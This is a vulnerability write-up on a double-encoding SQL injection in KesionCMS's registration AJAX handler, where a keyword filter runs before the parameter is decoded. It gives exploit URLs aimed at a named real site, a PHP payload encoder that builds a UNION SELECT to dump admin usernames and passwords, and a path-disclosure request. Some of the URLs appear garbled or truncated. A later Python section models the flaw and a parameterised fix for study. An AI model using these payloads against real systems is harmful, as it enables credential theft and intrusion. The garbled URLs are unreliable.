The vulnerability is in \User\Reg\RegAjax.asp on the registration page; lines 24-46 and 254-270 of that file are as follows:
Class Ajax_Check
    Private KS
    Private Sub Class_Initialize()
        Set KS = New PublicCls
    End Sub
    Private Sub Class_Terminate()
        Set KS = Nothing
    End Sub
    Public Sub Kesion()
        Select Case KS.S("Action")
            Case "checkusername"
                Call CheckUserName()
            Case "checkemail"
                Call CheckEmail()
            Case "checkcode"
                Call CheckCode()
            Case "getregform"
                Call GetRegForm()
            Case "getcityoption"
                Call getCityOption()
        End Select
    End Sub
    ' ...... irrelevant code omitted
    Sub getCityOption()
        Dim Province, XML, Node
        Province = UnEscape(KS.S("Province"))   ' note this line: filtered by KS.S first, decoded by UnEscape afterwards
        Dim RS: Set RS = Server.CreateObject("ADODB.RECORDSET")
        RS.Open "Select top 200 a.ID, a.city From KS_Province a Inner Join KS_Province b On a.parentID = b.ID Where b.city = '" & Province & "' order by a.orderid, a.id", conn, 1, 1
        If Not RS.Eof Then
            Set XML = KS.RsToXml(RS, "row", "")
        End If
        RS.Close: Set RS = Nothing
        If IsObject(XML) Then
            For Each Node In XML.DocumentElement.SelectNodes("row")
                KS.echo "<option value=""" & Node.selectSingleNode("@city").text & """>" & Node.selectSingleNode("@city").text & "</option>"
            Next
        End If
        Set XML = Nothing
    End Sub
End Class
In the code above, Province = UnEscape(KS.S("Province")) first passes the parameter through the user-defined function KS.S for filtering and only afterwards through UnEscape for decoding.
KS.S, and the DelSql function it calls, are defined as follows (UnEscape is the VBScript built-in that decodes %XX sequences):
Function DelSql(Str)
    Dim SplitSqlStr, SplitSqlArr, I
    SplitSqlStr = "dbcc|alter|drop|*|and|exec|or|insert|select|delete|update|count|master|truncate|declare|char|mid|chr|set|where|xp_cmdshell"
    SplitSqlArr = Split(SplitSqlStr, "|")
    For I = LBound(SplitSqlArr) To UBound(SplitSqlArr)
        If InStr(LCase(Str), SplitSqlArr(I)) > 0 Then
            Die "<script>alert('System warning!\n\n1. The data you submitted contains the malicious characters " & SplitSqlArr(I) & ";\n2. Your data has been recorded;\n3. Your IP address: " & GetIP & ";\n4. Operation date: " & Now & ";\nPowered By Kesion.com!');window.close();</script>"
        End If
    Next
    DelSql = Str
End Function
' Get the value of Request.QueryString or Request.Form.
Public Function S(Str)
    S = DelSql(Replace(Replace(Request(Str), "'", ""), """", ""))
End Function
The logic here is back to front: the quote stripping and the DelSql keyword check run on the still-encoded parameter, and UnEscape decodes it only afterwards, so a double-URL-encoded value passes the filter and is decoded into the SQL string. This is the same class of flaw as double-encoding bugs in PHP applications. It is easy to exploit and can be combined as follows:
Http://www.bkjia.com/user/reg/regajax. asp? Action = getcityoption & province = % 2527% 2520% 2575% 2569% 256e % 2520% 256f % 256e % 2553% 2565% 2565% 256c % 2563% 2574% 2520% 2574% 256f % 2570% 2520% 2531% 2530% 2520% 2541%
That is for Access; for MSSQL the SQL statement has to be changed. The script used to double-encode the statement:
<?php
$str = "'Union Select top 10 AdminID,UserName&chr(124)&PassWord From KS_Admin";
$temp = "";
for ($i = 0; $i <= strlen($str); $i++) {
    $temp .= "%25" . base_convert(ord($str[$i]), 10, 16);
}
echo $temp . "0";
?>
Replace 'Union Select top 10 AdminID,UserName&chr(124)&PassWord From KS_Admin with the SQL statement you need. (For MSSQL a direct backup is more convenient.)
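A Python model of the order-of-operations flaw in getCityOption, added here as an illustration (it is not Kesion's code): KS.S filters the parameter as received and UnEscape decodes it afterwards, so a double-encoded value slips through, whereas the hardened variant finishes decoding first, allow-lists the result, and runs the query with a bound parameter. The keyword list is transcribed from DelSql above; the KS_Province rows and the encoded sample are constructed test data.

```python
import re
import sqlite3
from urllib.parse import unquote

# Keyword list transcribed from DelSql above (the lone "*" entry omitted).
SQL_KEYWORDS = ("dbcc", "alter", "drop", "and", "exec", "or", "insert", "select",
                "delete", "update", "count", "master", "truncate", "declare",
                "char", "mid", "chr", "set", "where", "xp_cmdshell")

def ks_s(request_value: str) -> str:
    """Model of KS.S: strip both quote characters, then DelSql's keyword check."""
    value = request_value.replace("'", "").replace('"', "")
    hit = next((k for k in SQL_KEYWORDS if k in value.lower()), None)
    if hit is not None:
        raise ValueError(f"DelSql blocked keyword: {hit}")
    return value

def vulnerable_province(raw_query_value: str) -> str:
    """Original order: IIS decodes once, KS.S filters, UnEscape decodes again."""
    request_value = unquote(raw_query_value)       # what Request("Province") returns
    return unquote(ks_s(request_value))             # UnEscape(KS.S("Province"))

def hardened_province(raw_query_value: str) -> str:
    """Fixed order: finish all decoding first, then allow-list the decoded value."""
    value = unquote(unquote(raw_query_value))
    if not re.fullmatch(r"[\w \-]{1,50}", value):
        raise ValueError("province rejected")
    return value

def rejected(check, raw_query_value: str) -> bool:
    try:
        check(raw_query_value)
    except ValueError:
        return True
    return False

def city_options(province: str) -> list:
    """Parameterised form of the RS.Open query, run over a constructed sample table."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE KS_Province(ID, city, parentID, orderid)")
    db.executemany("INSERT INTO KS_Province VALUES (?, ?, ?, ?)",
                   [(1, "Guangdong", 0, 1), (2, "Guangzhou", 1, 1), (3, "Shenzhen", 1, 2)])
    rows = db.execute("SELECT a.city FROM KS_Province a INNER JOIN KS_Province b "
                      "ON a.parentID = b.ID WHERE b.city = ? ORDER BY a.orderid, a.ID",
                      (province,)).fetchall()
    return [r[0] for r in rows]

# Constructed sample: the text "' select" double URL-encoded, as in the request above.
DOUBLE_ENCODED = "%2527%2520%2573%2565%256c%2565%2563%2574"
```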
Because a CLng type conversion is performed during decoding, a submitted character that cannot be converted raises an error that discloses the physical path.
Path disclosure: http://www.bkjia.com/user/reg/regajax.asp?Action=getcityoption&province=%25i
:
Http://www.bkjia.com/user/reg/regajax. asp? Action = getcityoption & province = goingta % 2527% union % 2520 2520% 2573% 256C % 2565% 2565% 2563% 2574%, username % 252B % 25201 257C % 2527% 2527% Bpassword % 252 from % 2520KS_Admin % 2520
Author: my5t3ry